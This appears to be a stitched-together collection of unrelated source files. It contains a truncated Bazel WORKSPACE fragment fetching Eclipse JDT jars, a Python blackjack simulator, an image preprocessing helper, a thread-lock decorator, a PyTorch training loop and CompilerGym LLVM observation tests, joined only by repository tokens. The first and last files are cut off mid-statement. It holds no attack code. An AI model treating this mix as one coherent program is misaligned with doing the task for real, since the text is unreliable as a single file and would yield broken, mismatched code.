"http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.contenttype_3.7.200.v20181107-1343.jar", sha256 = "28b74f2a273a7a633845c315dbfe6b3bbc65e6fdefdb213fbecc43ded86fd8f2", ) http_jar( name = "org_eclipse_jdt_jobs", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.jobs_3.10.200.v20180912-1356.jar", sha256 = "a5aaaaa2ffac532fa0582f32223cca91813e310d19fdf076ba230da1a2371533", ) http_jar( name = "org_eclipse_jdt_resources", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.resources_3.13.200.v20181121-1020.jar", sha256 = "63c423ca7e8ae7aeb18eb91c60c632ccd11fd1da54f3d5e7601af83e730855d2", ) http_jar( name = "org_eclipse_jdt_runtime", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.core.runtime_3.15.100.v20181107-1343.jar", sha256 = "3c089d14ffb9329dfdde75acbef481235abb1c98ad27bd7148aba48637c11e74", ) http_jar( name = "org_eclipse_jdt_equinox_common", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.equinox.common_3.10.200.v20181021-1645.jar", sha256 = "224a35deeb64ea7271bce3d976974cd76e162e1366631ab01ada95426152fa24", ) http_jar( name = "org_eclipse_jdt_equinox_preferences", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.equinox.preferences_3.7.200.v20180827-1235.jar", sha256 = "93c227ed2b6780d605ff48e93add77db00083f9b98a19392c6123b08caadbabd", ) http_jar( name = "org_eclipse_jdt_compiler_apt", url = 
"http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.jdt.compiler.apt_1.3.400.v20181205-0900.jar", sha256 = "33541f28373d9e3277210c32ae9e4345851324a0c324a2c08411fe54b6028b9b", ) http_jar( name = "org_eclipse_jdt_core", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.jdt.core_3.16.0.v20181130-1748.jar", sha256 = "7c71886a76964a825eb734d22dedbd3a1efa2c19bec3af26d07b7bbe8167d943", ) http_jar( name = "org_eclipse_jdt_osgi", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.osgi_3.13.200.v20181130-2106.jar", sha256 = "03e5e8715d03605d0cf26ad93cbe005cffe070792bbc1aa27e0540aa0c1aa178", ) http_jar( name = "org_eclipse_jdt_text", url = "http://download.eclipse.org/eclipse/updates/4.10/R-4.10-201812060815/plugins/org.eclipse.text_3.8.0.v20180923-1636.jar", sha256 = "bca08fbddb5b13a79be82b10c57105e2e6353b15a8b82b4a59d02b67618c92cf", ) http_archive( name = "org_gwtproject_gwt", url = "https://gwt.googlesource.com/gwt/+archive/master.tar.gz", ) # proto_library and java_proto_library rules implicitly depend on # @com_google_protobuf for protoc and proto runtimes. http_archive( name = "com_google_protobuf", strip_prefix = "protobuf-3.6.1.3", urls = ["https://github.com/google/protobuf/archive/v3.6.1.3.zip"], ) # needed for protobuf native.bind( name = "guava", actual = "@com_google_guava", ) # needed for protobuf native.bind( name = "gson", actual = "@com_google_code_gson", ) <gh_stars>0 from deck import Deck from bj import BJ class Dealer: def __init__(self, players, n_decks=1, print_game=False): self.n_decks = n_decks self.n_players = len(players) self.players = players self.deck = Deck(n_decks) self.print_game = print_game def cprint(self, string): # Controlled print only if control_var is True if self.print_game is True: print(string) def shuffle(self): self.deck.shuffle() def reset_game(self): self.dealer_hand = [] self.player_hands = [] self.bets = [0] * self.n_players self.player_totals = [0] * self.n_players for _ in range(self.n_players): self.player_hands.append([]) self.shuffle() def collect_bets(self): for i, player in enumerate(self.players): self.bets[i] = player.get_bet(self.shuffled) def init_deal(self): # This condition should be altered # TO DO: Implement immediate blackjack if self.deck.remaining_cards() < 10: self.shuffle() self.shuffled = True else: self.shuffled = False self.collect_bets() self.dealer_hand.append(self.deck.draw()) self.dealer_hand.append(self.deck.draw()) self.cprint(f"Dealer's face up card is {self.dealer_hand[0]}\n") for i in range(self.n_players): # Each player recieves 2 cards # In real BJ they are dealt one card each and then another # Here it doesn't really matter self.player_hands[i].append(self.deck.draw()) self.player_hands[i].append(self.deck.draw()) self.cprint(f"Player {i} draws {self.player_hands[i][0]} and {self.player_hands[i][1]}.") self.cprint(f"Player {i} has a score of {BJ.get_hand_value(self.player_hands[i])[0]}") self.cprint("\n") def play(self): # Plays one round of BJ # TO DO: Implement split, insurance and doubledown self.init_deal() # Players Decisions for i, player in enumerate(self.players): self.cprint(f"Player {i} turn:") avaliable_decision = ['Hit', 'Stand'] # TO DO: Implement this properly dealer_card = self.dealer_hand[0] my_ids = [i] info = (avaliable_decision, dealer_card, my_ids, self.player_hands) decision = player.get_decision(info) while decision != 'Stand': if decision == 'Hit': 
self.player_hands[i].append(self.deck.draw()) self.cprint(f"Player {i} draws {self.player_hands[i][-1]}.") total = BJ.get_hand_value(self.player_hands[i])[0] if total >= 21: self.cprint(f"Player {i} went bust with a total of {total}") self.player_totals[i] = total break else: self.cprint(f"Player {i} has a total of {total}") info = (avaliable_decision, dealer_card, my_ids, self.player_hands) decision = player.get_decision(info) if decision == 'Stand': self.cprint(f"Player {i} stands.") total = BJ.get_hand_value(self.player_hands[i])[0] self.player_totals[i] = total self.cprint("\n") # Dealer's play self.cprint(f"Dealer's face up card is {self.dealer_hand[0]}") self.cprint(f"Dealer's face down card is {self.dealer_hand[1]}") d_total = BJ.get_hand_value(self.dealer_hand)[0] while d_total < 17: self.dealer_hand.append(self.deck.draw()) self.cprint(f"Dealer draw {self.dealer_hand[-1]}") d_total = BJ.get_hand_value(self.dealer_hand)[0] self.cprint(f"Dealer's total score is {d_total}") if d_total > 21: self.cprint(f"Dealer went bust.") self.cprint("\n") # Game Report results = [] for i in range(self.n_players): total = self.player_totals[i] if d_total > 21 and total <= 21: self.cprint(f"Player {i}, score {total}: WON") results.append(1) elif total > 21: self.cprint(f"Player {i}, score {total}: BUST") results.append(0) elif d_total == total: self.cprint(f"Player {i}, score {total}: PUSH") results.append(0.5) elif d_total > total: self.cprint(f"Player {i}, score {total}: LOST") results.append(0) elif d_total < total: self.cprint(f"Player {i}, score {total}: WON") results.append(1) return results from player import HitUntilPlayer, ManualPlayer, BasicThorp a = HitUntilPlayer(17) b = HitUntilPlayer(16) bt = BasicThorp() d = Dealer([bt], print_game=False) d.reset_game() N = 1000000 score = 0 for _ in range(N): d.reset_game() score += d.play()[0] print(score / N) # !/Users/kbsriharsha/anaconda3/bin/python # coding: utf-8 # @author: <NAME> """ This program provides all the necessary preprocessing libraries """ # Importing libraries import pandas as pd import cv2 import numpy as np import os def resize(img, width, height, interpolation=cv2.INTER_AREA): ''' This function resizes the image ''' return cv2.resize(img, (width, height), interpolation) def images_from_folder(folder, label = 1): ''' This function extracts all the images and resizes them to be used by MobileNet ''' images = [] labels = [] for file in os.listdir(folder): image = cv2.imread(os.path.join(folder,file)) if image is not None: image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) image = resize(image, 224, 224) images.append(image) labels.append(label) return images, labels def preprocess_input(x, v2=True): ''' This function preprocess the image input (normaliztion) ''' x = x.astype('float32') x = x / 255.0 ''' if v2: x = x - 0.5 x = x * 2.0 ''' return x <gh_stars>0 #!/usr/bin/env python3 # # Copyright 2022 Graviti. Licensed under MIT License. # """Common tools.""" from collections import defaultdict from functools import wraps from threading import Lock from typing import Any, Callable, DefaultDict, TypeVar _CallableWithoutReturnValue = TypeVar("_CallableWithoutReturnValue", bound=Callable[..., None]) _T = TypeVar("_T") locks: DefaultDict[int, Lock] = defaultdict(Lock) def locked(func: _CallableWithoutReturnValue) -> _CallableWithoutReturnValue: """The decorator to add threading lock for methods. Arguments: func: The method needs to add threading lock. Returns: The method with theading locked. 
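Examples:
    Rough usage sketch (hypothetical ``Loader`` class, for illustration
    only): when several threads call ``loader.load()`` concurrently, only
    one of them executes the body; the others block until it finishes and
    then return without re-running it.

        class Loader:
            @locked
            def load(self) -> None:
                ...  # expensive one-time work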
""" @wraps(func) def wrapper(self: Any, *arg: Any, **kwargs: Any) -> None: key = id(self) lock = locks[key] acquire = lock.acquire(blocking=False) try: if acquire: func(self, *arg, **kwargs) del locks[key] else: lock.acquire() finally: lock.release() return wrapper # type: ignore[return-value] def shorten(origin: str) -> str: """Return the first 7 characters of the original string. Arguments: origin: The string needed to be shortened. Returns: A string of length 7. """ return origin[:7] import time import math import torch.autograd import torch.nn as nn import dcp.utils as utils class View(nn.Module): """ Reshape data from 4 dimension to 2 dimension """ def forward(self, x): assert x.dim() == 2 or x.dim() == 4, "invalid dimension of input {:d}".format(x.dim()) if x.dim() == 4: out = x.view(x.size(0), -1) else: out = x return out class Trainer(object): """ Trainer for auxnet """ def __init__(self, model, train_loader, val_loader, settings, logger, tensorboard_logger, optimizer_state=None, run_count=0): self.settings = settings self.model = utils.data_parallel(model=model, n_gpus=self.settings.n_gpus) self.train_loader = train_loader self.val_loader = val_loader self.criterion = nn.CrossEntropyLoss().cuda() self.lr = self.settings.lr self.optimizer = torch.optim.SGD( params=self.model.parameters(), lr=self.settings.lr, momentum=self.settings.momentum, weight_decay=self.settings.weight_decay, nesterov=True) if optimizer_state is not None: self.optimizer.load_state_dict(optimizer_state) self.logger = logger self.tensorboard_logger = tensorboard_logger self.run_count = run_count def forward(self, images, labels=None): """ forward propagation """ # forward and backward and optimize output = self.model(images) if labels is not None: loss = self.criterion(output, labels) return output, loss else: return output, None def backward(self, loss): """ backward propagation """ self.optimizer.zero_grad() loss.backward() self.optimizer.step() def update_lr(self, epoch): """ Update learning rate of optimizers :param epoch: index of epoch """ gamma = 0 for step in self.settings.step: if epoch + 1.0 > int(step): gamma += 1 lr = self.settings.lr * math.pow(0.1, gamma) self.lr = lr for param_group in self.optimizer.param_groups: param_group['lr'] = lr def train(self, epoch): """ Train one epoch for auxnet :param epoch: index of epoch """ top1_error = utils.AverageMeter() top1_loss = utils.AverageMeter() top5_error = utils.AverageMeter() iters = len(self.train_loader) self.update_lr(epoch) # Switch to train mode self.model.train() start_time = time.time() end_time = start_time for i, (images, labels) in enumerate(self.train_loader): start_time = time.time() data_time = start_time - end_time if self.settings.n_gpus == 1: images = images.cuda() labels = labels.cuda() # forward output, loss = self.forward(images, labels) self.backward(loss) # compute loss and error rate single_error, single_loss, single5_error = utils.compute_singlecrop_error( outputs=output, labels=labels, loss=loss, top5_flag=True) top1_error.update(single_error, images.size(0)) top1_loss.update(single_loss, images.size(0)) top5_error.update(single5_error, images.size(0)) end_time = time.time() iter_time = end_time - start_time if i % self.settings.print_frequency == 0: utils.print_result(epoch, self.settings.n_epochs, i + 1, iters, self.lr, data_time, iter_time, single_error, single_loss, mode="Train", logger=self.logger) if self.tensorboard_logger is not None: self.tensorboard_logger.scalar_summary('train_top1_error', top1_error.avg, 
self.run_count) self.tensorboard_logger.scalar_summary('train_top5_error', top5_error.avg, self.run_count) self.tensorboard_logger.scalar_summary('train_loss', top1_loss.avg, self.run_count) self.tensorboard_logger.scalar_summary("lr", self.lr, self.run_count) self.logger.info("|===>Training Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}" .format(top1_error.avg, top1_loss.avg, top5_error.avg)) return top1_error.avg, top1_loss.avg, top5_error.avg def val(self, epoch): """ Validation :param epoch: index of epoch """ top1_error = utils.AverageMeter() top1_loss = utils.AverageMeter() top5_error = utils.AverageMeter() self.model.eval() iters = len(self.val_loader) start_time = time.time() end_time = start_time with torch.no_grad(): for i, (images, labels) in enumerate(self.val_loader): start_time = time.time() data_time = start_time - end_time if self.settings.n_gpus == 1: images = images.cuda() labels = labels.cuda() output, loss = self.forward(images, labels) # compute loss and error rate single_error, single_loss, single5_error = utils.compute_singlecrop_error( outputs=output, labels=labels, loss=loss, top5_flag=True) top1_error.update(single_error, images.size(0)) top1_loss.update(single_loss, images.size(0)) top5_error.update(single5_error, images.size(0)) end_time = time.time() iter_time = end_time - start_time if i % self.settings.print_frequency == 0: utils.print_result(epoch, self.settings.n_epochs, i + 1, iters, self.lr, data_time, iter_time, single_error, single_loss, mode="Validation", logger=self.logger) if self.tensorboard_logger is not None: self.tensorboard_logger.scalar_summary("val_top1_error", top1_error.avg, self.run_count) self.tensorboard_logger.scalar_summary("val_top5_error", top5_error.avg, self.run_count) self.tensorboard_logger.scalar_summary("val_loss", top1_loss.avg, self.run_count) self.run_count += 1 self.logger.info("|===>Testing Error: {:.4f} Loss: {:.4f}, Top5 Error: {:.4f}" .format(top1_error.avg, top1_loss.avg, top5_error.avg)) return top1_error.avg, top1_loss.avg, top5_error.avg <filename>tests/llvm/observation_spaces_test.py # Copyright (c) Facebook, Inc. and its affiliates. # # This source code is licensed under the MIT license found in the # LICENSE file in the root directory of this source tree. 
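# The tests below assume a working LLVM CompilerGym build; most of them reset
# the environment on the cbench-v1/crc32 benchmark and then probe a single
# observation space for its dtype, shape, determinism and platform dependence.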
"""Integrations tests for the LLVM CompilerGym environments.""" import os import sys from typing import Any, Dict, List import gym import networkx as nx import numpy as np import pytest from flaky import flaky from compiler_gym.envs.llvm.llvm_env import LlvmEnv from compiler_gym.spaces import Box from compiler_gym.spaces import Dict as DictSpace from compiler_gym.spaces import Scalar, Sequence from tests.pytest_plugins.common import ci_only from tests.test_main import main pytest_plugins = ["tests.pytest_plugins.llvm"] def test_default_observation_space(env: LlvmEnv): env.observation_space = "Autophase" assert env.observation_space.shape == (56,) assert env.observation_space_spec.id == "Autophase" env.observation_space = None assert env.observation_space is None assert env.observation_space_spec is None invalid = "invalid value" with pytest.raises(LookupError, match=f"Observation space not found: {invalid}"): env.observation_space = invalid def test_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") assert set(env.observation.spaces.keys()) == { "Autophase", "AutophaseDict", "Bitcode", "BitcodeFile", "Buildtime", "CpuInfo", "Inst2vec", "Inst2vecEmbeddingIndices", "Inst2vecPreprocessedText", "InstCount", "InstCountDict", "InstCountNorm", "InstCountNormDict", "Ir", "IrInstructionCount", "IrInstructionCountO0", "IrInstructionCountO3", "IrInstructionCountOz", "IrSha1", "IsBuildable", "IsRunnable", "ObjectTextSizeBytes", "ObjectTextSizeO0", "ObjectTextSizeO3", "ObjectTextSizeOz", "Programl", "ProgramlJson", "Runtime", "TextSizeBytes", "TextSizeO0", "TextSizeO3", "TextSizeOz", } def test_ir_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Ir" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (0, np.iinfo(np.int64).max) value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, str) assert space.space.contains(value) assert space.deterministic assert not space.platform_dependent def test_ir_sha1_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IrSha1" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (40, 40) value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, str) assert len(value) == 40 assert space.space.contains(value) assert space.deterministic assert not space.platform_dependent def test_bitcode_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Bitcode" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == np.int8 assert space.space.size_range == (0, np.iinfo(np.int64).max) assert space.deterministic assert not space.platform_dependent value: str = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.dtype == np.int8 assert space.space.contains(value) def test_bitcode_file_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "BitcodeFile" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) assert space.space.dtype == str assert space.space.size_range == (0, 4096) assert not space.deterministic assert not space.platform_dependent value: str = env.observation[key] print(value) # For debugging in case of error. 
try: assert isinstance(value, str) assert os.path.isfile(value) assert space.space.contains(value) finally: os.unlink(value) @pytest.mark.parametrize( "benchmark_uri", ["cbench-v1/crc32", "cbench-v1/qsort", "cbench-v1/gsm"] ) def test_bitcode_file_equivalence(env: LlvmEnv, benchmark_uri: str): """Test that LLVM produces the same bitcode as a file and as a byte array.""" env.reset(benchmark=benchmark_uri) bitcode = env.observation.Bitcode() bitcode_file = env.observation.BitcodeFile() try: with open(bitcode_file, "rb") as f: bitcode_from_file = f.read() assert bitcode.tobytes() == bitcode_from_file finally: os.unlink(bitcode_file) # The Autophase feature vector for benchmark://cbench-v1/crc32 in its initial # state. AUTOPHASE_CBENCH_CRC32 = [ 0, 0, 16, 12, 2, 16, 8, 2, 4, 8, 0, 0, 0, 29, 0, 24, 9, 2, 32, 44, 41, 14, 36, 16, 13, 0, 5, 26, 3, 5, 24, 20, 24, 33, 5, 10, 3, 51, 0, 1, 0, 5, 0, 0, 0, 42, 0, 1, 8, 5, 29, 242, 157, 15, 0, 103, ] def test_autophase_observation_space_reset(env: LlvmEnv): """Test that the intial observation is returned on env.reset().""" env.observation_space = "Autophase" observation = env.reset("cbench-v1/crc32") print(observation.tolist()) # For debugging on error. np.testing.assert_array_equal(observation, AUTOPHASE_CBENCH_CRC32) def test_instcount_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCount" space = env.observation.spaces[key] assert isinstance(space.space, Box) assert space.space.dtype == np.int64 assert space.space.shape == (70,) assert space.deterministic assert not space.platform_dependent value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. expected_values = [ 242, 29, 15, 5, 24, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 3, 1, 8, 26, 51, 42, 5, 0, 0, 0, 1, 5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 20, 0, 0, 0, 10, 0, 0, 33, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, ] np.testing.assert_array_equal(value, expected_values) assert value.dtype == np.int64 # The first value is the total number of instructions. This should equal the # number of instructions. assert sum(value[3:]) == value[0] def test_instcount_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) assert space.deterministic assert not space.platform_dependent value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. assert len(value) == 70 def test_instcount_norm_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountNorm" space = env.observation.spaces[key] assert isinstance(space.space, Box) assert space.space.dtype == np.float32 assert space.space.shape == (69,) assert space.deterministic assert not space.platform_dependent value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert value.shape == (69,) assert value.dtype == np.float32 # Assert that the normalized instruction counts sum to 1. Note that the # first two features (#blocks and #funcs) must be excluded. assert pytest.approx(sum(value[2:]), 1.0) def test_instcount_norm_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "InstCountNormDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) assert space.deterministic assert not space.platform_dependent value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. 
assert len(value) == 69 def test_autophase_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Autophase" space = env.observation.spaces[key] assert isinstance(space.space, Box) value: np.ndarray = env.observation[key] print(value.tolist()) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.shape == (56,) assert space.deterministic assert not space.platform_dependent np.testing.assert_array_equal(value, AUTOPHASE_CBENCH_CRC32) assert space.space.contains(value) def test_autophase_dict_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "AutophaseDict" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) value: Dict[str, int] = env.observation[key] print(value) # For debugging in case of error. assert len(value) == 56 assert space.deterministic assert not space.platform_dependent def test_programl_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "Programl" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) graph: nx.MultiDiGraph = env.observation[key] assert isinstance(graph, nx.MultiDiGraph) assert graph.number_of_nodes() == 512 assert graph.number_of_edges() == 907 assert graph.nodes[0] == { "block": 0, "function": 0, "text": "[external]", "type": 0, } assert space.deterministic assert not space.platform_dependent def test_programl_json_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "ProgramlJson" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) graph: Dict[str, Any] = env.observation[key] assert isinstance(graph, dict) def test_cpuinfo_observation_space(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "CpuInfo" space = env.observation.spaces[key] assert isinstance(space.space, DictSpace) value: Dict[str, Any] = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, dict) # Test each expected key, removing it as we go. assert isinstance(value.pop("name"), str) assert isinstance(value.pop("cores_count"), int) assert isinstance(value.pop("l1i_cache_size"), int) assert isinstance(value.pop("l1i_cache_count"), int) assert isinstance(value.pop("l1d_cache_size"), int) assert isinstance(value.pop("l1d_cache_count"), int) assert isinstance(value.pop("l2_cache_size"), int) assert isinstance(value.pop("l2_cache_count"), int) assert isinstance(value.pop("l3_cache_size"), int) assert isinstance(value.pop("l3_cache_count"), int) assert isinstance(value.pop("l4_cache_size"), int) assert isinstance(value.pop("l4_cache_count"), int) # Anything left in the JSON dictionary now is an unexpected key. assert not value invalid = "invalid value" with pytest.raises(KeyError) as ctx: _ = env.observation[invalid] assert str(ctx.value) == f"'{invalid}'" assert space.deterministic assert space.platform_dependent @pytest.fixture def cbench_crc32_inst2vec_embedding_indices() -> List[int]: """The expected inst2vec embedding indices for cbench-v1/crc32.""" # The linux/macOS builds of clang produce slightly different bitcodes. 
if sys.platform.lower().startswith("linux"): return [ 8564, 8564, 8564, 8564, 5, 46, 46, 40, 8564, 13, 8, 8564, 1348, 178, 286, 214, 182, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 2298, 8564, 289, 291, 3729, 3729, 8564, 178, 289, 289, 200, 1412, 1412, 8564, 3032, 180, 3032, 293, 3032, 205, 415, 205, 213, 8564, 8564, 8564, 204, 8564, 213, 215, 364, 364, 216, 8564, 216, 8564, 8564, 8564, 311, 634, 204, 8564, 415, 182, 640, 214, 182, 295, 675, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 8564, 8564, 634, 204, 8564, 213, 215, 415, 205, 216, 8564, 8564, 8564, 182, 961, 214, 415, 214, 364, 364, 216, 8564, 293, 3032, 180, 3032, 8564, 3032, 295, 257, 8564, 291, 178, 178, 200, 214, 180, 3032, 205, 216, 8564, 182, 977, 204, 8564, 182, 213, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 182, 420, 214, 213, 8564, 200, 216, 8564, 182, 961, 180, 3032, 2298, 8564, 289, 8564, 289, 178, 178, 289, 311, 594, 311, 180, 3032, 180, 3032, 293, 3032, 364, 216, 8564, 295, 431, 311, 425, 204, 8564, 597, 8564, 594, 213, 8564, 295, 653, 311, 295, 634, 204, 8564, 182, 182, 597, 213, 8564, 216, 8564, 216, 8564, 295, 634, 612, 293, 3032, 180, 3032, 180, 3032, 257, 8564, 289, 289, 8564, 8564, 178, 178, 289, 364, 311, 594, 8564, 3032, 8564, 180, 3032, 180, 3032, 8564, 8564, 8564, 204, 8564, 8564, 8564, 364, 364, 216, 8564, 8564, 8564, 8564, 8564, 205, 216, 8564, 182, 182, 488, 204, 8564, 295, 597, 182, 640, 182, 540, 612, 8564, 216, 8564, 182, 640, 214, 216, 8564, 364, 364, 216, 8564, 180, 3032, 180, 3032, 8564, 3032, 295, 257, ] elif sys.platform.lower().startswith("darwin"): return [ 8564, 8564, 5, 46, 46, 40, 8564, 13, 8, 8564, 1348, 178, 286, 214, 182, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 2298, 8564, 289, 291, 3729, 3729, 8564, 178, 289, 289, 200, 1412, 1412, 8564, 3032, 180, 3032, 293, 3032, 205, 415, 205, 213, 8564, 8564, 5666, 204, 8564, 213, 215, 364, 364, 216, 8564, 216, 8564, 5665, 8564, 311, 634, 204, 8564, 415, 182, 640, 214, 182, 295, 675, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 5665, 8564, 634, 204, 8564, 213, 215, 415, 205, 216, 8564, 5665, 8564, 182, 961, 214, 415, 214, 364, 364, 216, 8564, 293, 3032, 180, 3032, 8564, 3032, 295, 257, 8564, 291, 178, 178, 200, 214, 180, 3032, 205, 216, 8564, 182, 977, 204, 8564, 182, 213, 235, 697, 1513, 192, 8564, 182, 182, 395, 1513, 214, 216, 8564, 182, 420, 214, 213, 8564, 200, 216, 8564, 182, 961, 180, 3032, 2298, 8564, 289, 8564, 289, 178, 178, 289, 311, 594, 311, 180, 3032, 180, 3032, 293, 3032, 364, 216, 8564, 295, 431, 311, 425, 204, 8564, 597, 8564, 594, 213, 8564, 295, 653, 311, 295, 634, 204, 8564, 182, 182, 597, 213, 8564, 216, 8564, 216, 8564, 295, 634, 612, 293, 3032, 180, 3032, 180, 3032, 257, 8564, 289, 289, 8564, 8564, 178, 178, 289, 364, 311, 594, 8564, 3032, 8564, 180, 3032, 180, 3032, 8564, 8564, 5666, 204, 8564, 5391, 8564, 364, 364, 216, 8564, 5665, 8564, 5665, 8564, 205, 216, 8564, 182, 182, 488, 204, 8564, 295, 597, 182, 640, 182, 540, 612, 8564, 216, 8564, 182, 640, 214, 216, 8564, 364, 364, 216, 8564, 180, 3032, 180, 3032, 8564, 3032, 295, 257, ] else: raise NotImplementedError(f"Unknown platform: {sys.platform}") def test_inst2vec_preprocessed_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vecPreprocessedText" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: List[str] = env.observation[key] assert isinstance(value, list) for item, idx in zip(value, 
cbench_crc32_inst2vec_embedding_indices): assert isinstance(item, str) unk = env.inst2vec.vocab["!UNK"] indices = [env.inst2vec.vocab.get(item, unk) for item in value] print(indices) # For debugging in case of error. assert indices == cbench_crc32_inst2vec_embedding_indices assert space.deterministic assert not space.platform_dependent def test_inst2vec_embedding_indices_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vecEmbeddingIndices" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: List[int] = env.observation[key] print(value) # For debugging in case of error. print(value) assert isinstance(value, list) for item in value: assert isinstance(item, int) assert value == cbench_crc32_inst2vec_embedding_indices assert space.deterministic assert not space.platform_dependent def test_inst2vec_observation_space( env: LlvmEnv, cbench_crc32_inst2vec_embedding_indices: List[int] ): env.reset("cbench-v1/crc32") key = "Inst2vec" space = env.observation.spaces[key] assert isinstance(space.space, Sequence) value: np.ndarray = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, np.ndarray) assert value.dtype == np.float32 height, width = value.shape assert width == len(env.inst2vec.embeddings[0]) assert height == len(cbench_crc32_inst2vec_embedding_indices) # Check a handful of values. np.testing.assert_array_almost_equal( value.tolist(), [ env.inst2vec.embeddings[idx] for idx in cbench_crc32_inst2vec_embedding_indices ], ) assert space.deterministic assert not space.platform_dependent def test_ir_instruction_count_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "IrInstructionCount" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 242 key = "IrInstructionCountO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 242 key = "IrInstructionCountO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 164 key = "IrInstructionCountOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert not space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == 114 def test_object_text_size_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") # Expected .text sizes for this benchmark: -O0, -O3, -Oz. crc32_code_sizes = {"darwin": [1171, 3825, 3289], "linux": [1183, 3961, 3286]} key = "ObjectTextSizeBytes" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. 
assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][0] key = "ObjectTextSizeO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][0] key = "ObjectTextSizeO3" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][1] key = "ObjectTextSizeOz" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) assert value == crc32_code_sizes[sys.platform][2] def test_text_size_observation_spaces(env: LlvmEnv): env.reset("cbench-v1/crc32") key = "TextSizeBytes" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert space.platform_dependent value: int = env.observation[key] print(value) # For debugging in case of error. assert isinstance(value, int) key = "TextSizeO0" space = env.observation.spaces[key] assert isinstance(space.space, Scalar) assert space.deterministic assert 